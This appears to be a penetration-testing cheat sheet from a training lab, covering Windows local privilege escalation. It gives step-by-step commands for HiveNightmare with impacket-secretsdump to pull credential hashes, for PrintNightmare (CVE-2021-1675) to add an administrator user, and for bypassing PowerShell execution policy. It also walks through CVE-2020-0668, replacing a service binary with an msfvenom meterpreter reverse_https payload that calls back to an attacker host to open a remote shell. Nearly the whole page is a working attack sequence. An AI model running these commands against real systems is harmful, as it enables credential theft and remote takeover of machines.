kernel-exploit 1

Windows vulnerabilities table

.\HiveNightmare.exe

Transfer output files to the target host

impacket-secretsdump -sam SAM-2021-08-07 -system SYSTEM-2021-08-07 -security SECURITY-2021-08-07 local

Affected windows 10 Build 10240, etc

Check for spooler service

ls \\localhost\pipe\spoolss #(path doesn't exist error)

Bypass execution policy

Set-ExecutionPolicy Bypass -Scope Process

Exploit

Import-module .\CVE-2021-1675.ps1

Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"

Confirm new user

net user hacker

This exploit need to be chained with another vulnerability, such as UsoDllLoader and diaghub to load the DLL

whoami /priv

Looking for third-party DLL (binary permission check)

icacls "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

Generate malicious binary

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe

python -m http.server 8080

Exploit

CVE-2020-0668.exe C:\Users\htb-student\Desktop\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

Check permission of new file

icacls 'C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe'

Replace file with malicious binary

copy /Y C:\Users\htb-student\Desktop\maintenanceservice2.exe "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

Start the service

Got reverse shell in MSFConsole

net start MozillaMaintenance

Last updated 1 day ago